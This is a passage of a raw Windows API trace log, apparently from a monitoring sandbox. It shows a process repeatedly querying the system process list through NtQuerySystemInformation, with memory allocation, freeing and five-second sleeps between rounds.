BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.947] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.954] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.962] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.968] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.976] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.995] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.002] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.008] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.021] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.044] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.052] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.059] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.066] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.074] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.083] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.098] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.106] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 